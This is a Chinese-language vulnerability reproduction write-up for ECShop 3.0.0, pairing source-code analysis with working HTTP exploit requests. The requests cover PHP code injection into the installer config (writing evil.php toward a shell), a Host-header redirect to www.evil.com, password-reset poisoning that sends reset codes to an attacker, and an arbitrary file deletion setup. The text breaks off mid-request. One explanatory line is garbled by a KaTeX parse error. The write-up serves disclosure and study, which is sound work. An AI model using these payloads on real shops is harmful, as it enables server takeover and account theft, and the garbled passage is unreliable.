ECShop-v3.0.0漏洞复现

配置文件写入导致代码执行
- HTTP Host头部攻击导致任意页面跳转
- - HTTP Host头部攻击导致前台任意密码重置
后台任意文件删除
后台SQL注入

配置文件写入导致代码执行

在\ECShop -v3.0.0\install\index.php文件中，使用POST请求接收配置信息的值，并且直接传入到create_config_file方法。

case 'create_config_file' :$db_host    = isset($_POST['db_host'])      ?   trim($_POST['db_host']) : '';$db_port    = isset($_POST['db_port'])      ?   trim($_POST['db_port']) : '';$db_user    = isset($_POST['db_user'])      ?   trim($_POST['db_user']) : '';$db_pass    = isset($_POST['db_pass'])      ?   trim($_POST['db_pass']) : '';$db_name    = isset($_POST['db_name'])      ?   trim($_POST['db_name']) : '';$prefix     = isset($_POST['db_prefix'])    ?   trim($_POST['db_prefix']) : '';$timezone   = isset($_POST['timezone'])     ?   trim($_POST['timezone']) : 'Asia/Shanghai';$result = create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix,  $timezone);if ($result === false)

跟踪create_config_file（)方法，在\ECShop-3.0.0\install\includes\lib_installer.php文件中发现该该方法，其中关键代码如下，将传入的配置信息，直接写在配置文件中，整个过程未对POST传入的数据进行安全处理，因此存在配置文件写入导致代码执行的问题。

function create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix, $timezone)
{global $err, $_LANG;$db_host = construct_db_host($db_host, $db_port);$content = '<?' ."php\n";$content .= "// database host\n";$content .= "\$db_host   = \"$db_host\";\n\n";$content .= "// database name\n";$content .= "\$db_name   = \"$db_name\";\n\n";$content .= "// database username\n";$content .= "\$db_user   = \"$db_user\";\n\n";$content .= "// database password\n";$content .= "\$db_pass   = \"$db_pass\";\n\n";$content .= "// table prefix\n";$content .= "\$prefix    = \"$prefix\";\n\n";$content .= "\$timezone    = \"$timezone\";\n\n";$content .= "\$cookie_path    = \"/\";\n\n";$content .= "\$cookie_domain    = \"\";\n\n";$content .= "\$session = \"1440\";\n\n";$content .= "define('EC_CHARSET','".EC_CHARSET."');\n\n";$content .= "define('ADMIN_PATH','admin');\n\n";$content .= "define('AUTH_KEY', 'this is a key');\n\n";$content .= "define('OLD_AUTH_KEY', '');\n\n";$content .= "define('API_TIME', '');\n\n";$content .= "define('STORE_KEY','".md5(microtime())."');\n\n";$content .= '?>';$fp = @fopen(ROOT_PATH . 'data/config.php', 'wb+');if (!$fp){$err->add($_LANG['open_config_file_failed']);return false;}if (!@fwrite($fp, trim($content))){$err->add($_LANG['write_config_file_failed']);return false;}@fclose($fp);return true;
}

复现：

在进行安装操作的时候可以在如下请求包中的db_host,db_port,db_user,db_pass,db_name,db_prefix,timezone位置上写入PHP代码。如下以db_name和timezone为例。

进行如下请求，会在配置文件中写入PHP代码。

POST /install/index.php?step=create_config_file HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=

Content-Length: 324

Cookie: ECS[visit_times]=3; ECS[history]=72; PHPSESSID=uao2tc7rcn7c7lni4afpdmo2e5

Connection: close

db_host=localhost&db_port=3306&db_user=root&db_pass=root&db_name=ecshop30%22.die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&db_prefix=ecs_&timezone=PRC".die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&lang=zh_cn&IS_AJAX_REQUEST=yes

请求成功后查看配置文件。

发现配置文件中的db_name和timezone位置写入了PHP代码。

访问http://127.0.0.1/data/config.php配置文件所在的位置，便会生成evil.php的恶意文件。

访问http://127.0.0.1/data/evil.php可以执行相应的PHP代码导致GetShell。

HTTP Host头部攻击导致任意页面跳转

在\ECShop-3.0.0\install\index.php文件中将拼接后的url传入到header函数中然后进行跳转。

case 'done' :$result = deal_aftermath();clear_all_files();if($_SERVER['HTTP_HOST']!='localhost' && $_REQUEST['type']=='yunqi'){$url = url()."/yunqi_check.php?act=yunqi_check";header("Location: ".$url);exit;}else{if ($result === false){$err_msg = implode(',', $err->get_all());$smarty->assign('err_msg', $err_msg);$smarty->display('error.php');}

跟入url方法，在\ECShop-3.0.0\install\includes\lib_installer.php文件中发现该方法，使用$_SERVER[‘HTTP_HOST’]方式获取主机名然后进行拼接后返回到方法被调用的位置，因此存在http host 部攻击导致任意跳转的问题。

function url()
{$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];$ecserver = 'http://'.$_SERVER['HTTP_HOST'].($_SERVER['SERVER_PORT'] && $_SERVER['SERVER_PORT'] != 80 ? ':'.$_SERVER['SERVER_PORT'] : '');$default_appurl = $ecserver.substr($PHP_SELF, 0, strpos($PHP_SELF, 'install/') - 1);return $default_appurl;}

复现：
进行如下请求，返回302跳转到www.evil.com站点。

GET /install/index.php?lang=zh_cn&step=done&type=yunqi HTTP/1.1

Host: www.evil.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=

Connection: close

Upgrade-Insecure-Requests: 1

HTTP Host头部攻击导致前台任意密码重置

在\ECShop3.0.0\user.php文件中，当使用邮箱进行密码重置的时候，会调用send_pwd_email的方法。

/* 发送密码修改确认邮件 */
elseif ($action == 'send_pwd_email')
{include_once(ROOT_PATH . 'includes/lib_passport.php');/* 初始化会员用户名和邮件地址 */$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$email     = !empty($_POST['email'])     ? trim($_POST['email'])     : '';//用户名和邮件地址是否匹配$user_info = $user->get_user_info($user_name);if ($user_info && $user_info['email'] == $email){//生成code//$code = md5($user_info[0] . $user_info[1]);$code = md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']);//发送邮件的函数if (send_pwd_email($user_info['user_id'], $user_name, $email, $code)){show_message($_LANG['send_success'] . $email, $_LANG['back_home_lnk'], './', 'info');}else{//发送邮件出错show_message($_LANG['fail_send_password'], $_LANG['back_page_up'], './', 'info');}}else{//用户名与邮件地址不匹配show_message($_LANG['username_no_email'], $_LANG['back_page_up'], '', 'info');}
}

跟入send_pwd_email方法，在\ECShop-3.0.0\includes\lib_passport.php文件中使用了url方法，然后将邮件中的正文内容进行拼接，拼接后的结果为content，再将content，再将content，再将content传入send_mail方法。

    /* 设置重置邮件模板所需要的内容信息 */$template    = get_mail_template('send_password');$reset_email = $GLOBALS['ecs']->url() . 'user.php?act=get_password&uid=' . $uid . '&code=' . $code;$GLOBALS['smarty']->assign('user_name',   $user_name);$GLOBALS['smarty']->assign('reset_email', $reset_email);$GLOBALS['smarty']->assign('shop_name',   $GLOBALS['_CFG']['shop_name']);$GLOBALS['smarty']->assign('send_date',   date('Y-m-d'));$GLOBALS['smarty']->assign('sent_date',   date('Y-m-d'));$content = $GLOBALS['smarty']->fetch('str:' . $template['template_content']);/* 发送确认重置密码的确认邮件 */if (send_mail($user_name, $email, $template['template_subject'], $content, $template['is_html'])){return true;}else{return false;}
}

跟入url方法，在\ECShop3.0.0\includes\cls_ecshop.php文件中发现该方法，该方法return的时候调用了get_domain方法。

function url(){$curr = strpos(PHP_SELF, ADMIN_PATH . '/') !== false ?preg_replace('/(.*)(' . ADMIN_PATH . ')(\/?)(.)*/i', '\1', dirname(PHP_SELF)) :dirname(PHP_SELF);$root = str_replace('\\', '/', $curr);if (substr($root, -1) != '/'){$root .= '/';}return $this->get_domain() . $root;}

跟入get_domain方法，在\ECShop3.0.0\includes\cls_ecshop.php文件的中发现该方法，在该文件中，使用了KaTeX parse error: Double subscript at position 16: _SERVER['HTTP_X_̲FORWARDED_HOST'…_SERVER[‘HTTP_HOST’]来获取主机域名和IP地址，属于用户可以控制的输入点。因此整个发送邮件过程中，正文部分可以通过修改HTTP 请求的host进行伪造。

 function get_domain(){/* 协议 */$protocol = $this->http();/* 域名或IP地址 */if (isset($_SERVER['HTTP_X_FORWARDED_HOST'])){$host = $_SERVER['HTTP_X_FORWARDED_HOST'];}elseif (isset($_SERVER['HTTP_HOST'])){$host = $_SERVER['HTTP_HOST'];}else{/* 端口 */if (isset($_SERVER['SERVER_PORT'])){$port = ':' . $_SERVER['SERVER_PORT'];if ((':80' == $port && 'http://' == $protocol) || (':443' == $port && 'https://' == $protocol)){$port = '';}}else{$port = '';}if (isset($_SERVER['SERVER_NAME'])){$host = $_SERVER['SERVER_NAME'] . $port;}elseif (isset($_SERVER['SERVER_ADDR'])){$host = $_SERVER['SERVER_ADDR'] . $port;}}return $protocol . $host;}

复现：

在得知用户名和注册邮箱的情况下，可以使用如下的请求发送密码重置链接。

POST /user.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 98

Referer: http://127.0.0.1/user.php?act=get_password

Cookie: ECS[visit_times]=2; ECS_ID=500ac5868ca2faceb1b34797cd8f7bebf6ed1009

client-ip: 127.0.0.2

X-Forwarded-For: 127.0.0.3

Connection: close

Upgrade-Insecure-Requests: 1

user_name=Thinking&email=thinking_balabala%40163.com&act=send_pwd_email&submit=%E6%8F%90+%E4%BA%A4
受害者就会收到一封如下信息的邮件，点击邮件中的重置密码链接就会将重置密码的key发送到攻击者的服务器上。

攻击者收到重置密码的code，便可以进行密码重置。

后台任意文件删除

在\ECShop3.0.0\admin\article.php文件中的代码块，其中使用POST接收file_url参数的值，然后将内容插入到数据库中的article表。

/* 计算文章打开方式 */if ($file_url == ''){$open_type = 0;}else{$open_type = $_POST['FCKeditor1'] == '' ? 1 : 2;}/*插入数据*/$add_time = gmtime();if (empty($_POST['cat_id'])){$_POST['cat_id'] = 0;}$sql = "INSERT INTO ".$ecs->table('article')."(title, cat_id, article_type, is_open, author, "."author_email, keywords, content, add_time, file_url, open_type, link, description) "."VALUES ('$_POST[title]', '$_POST[article_cat]', '$_POST[article_type]', '$_POST[is_open]', "."'$_POST[author]', '$_POST[author_email]', '$_POST[keywords]', '$_POST[FCKeditor1]', "."'$add_time', '$file_url', '$open_type', '$_POST[link_url]', '$_POST[description]')";$db->query($sql);

然后在该文件的如下代码中，从数据库的article表将file_url，取出来进行然后使用unlink进行删除操作，整个过程未对文件名称进行安全处理，导致存在任意文件删除漏洞。

elseif ($_REQUEST['act'] == 'remove')
{check_authz_json('article_manage');$id = intval($_GET['id']);/* 删除原来的文件 */$sql = "SELECT file_url FROM " . $ecs->table('article') . " WHERE article_id = '$id'";$old_url = $db->getOne($sql);if ($old_url != '' && strpos($old_url, 'http://') === false && strpos($old_url, 'https://') === false){@unlink(ROOT_PATH . $old_url);}

复现：
先将要删除的文件路径添加到file_url参数的位置，然后进行如下请求，往数据库的article表中插入一条带有要删除的目标文件路径的数据。

POST /admin/article.php HTTP/1.1

Host: 127.0.0.1

Content-Length: 1873

Cache-Control: max-age=0

Origin: http://127.0.0.1

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryab9PkzCWZGRw6awU

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Referer: http://127.0.0.1/admin/article.php?act=add

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: loginNum=3; ECS_LastCheckOrder=Tue%2C%2023%20Jan%202018%2002%3A55%3A15%20GMT; Toggle_State_1={},Wed, 24 Jan 2018 06:42:48 GMT; ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A9%253A%257Bs%253A7%253A%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522cat_id%2522%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2522%253Bs%253A12%253A%2522a.article_id%2522%253Bs%253A10%253A%2522sort_order%2522%253Bs%253A4%253A%2522DESC%2522%253Bs%253A12%253A%2522record_count%2522%253Bs%253A2%253A%252235%2522%253Bs%253A9%253A%2522page_size%2522%253Bi%253A15%253Bs%253A4%253A%2522page%2522%253Bi%253A1%253Bs%253A10%253A%2522page_count%2522%253Bd%253A3%253Bs%253A5%253A%2522start%2522%253Bi%253A0%253B%257D; ECSCP[lastfiltersql]=U0VMRUNUIGEuKiAsIGFjLmNhdF9uYW1lIEZST00gYGVjc2hvcDMwYC5gZWNzX2FydGljbGVgIEFTIGEgTEVGVCBKT0lOIGBlY3Nob3AzMGAuYGVjc19hcnRpY2xlX2NhdGAgQVMgYWMgT04gYWMuY2F0X2lkID0gYS5jYXRfaWQgV0hFUkUgMSAgT1JERVIgYnkgYS5hcnRpY2xlX2lkIERFU0M%3D; security_level=1; __guid=96992031.2794073907059157500.1501489482338.276; sYQDUGqqzHsearch_history=a%7C1; a9617_times=1; bdshare_firstime=1510970163771; ECS_ID=54f1ee86ca058e2980cef4a2a937ba2697eb82ea; ECS[visit_times]=1; ECSCP_ID=0c82abaa20ce2ecacb164e5218eaccbc3e3ce52f; monitor_count=9

Connection: close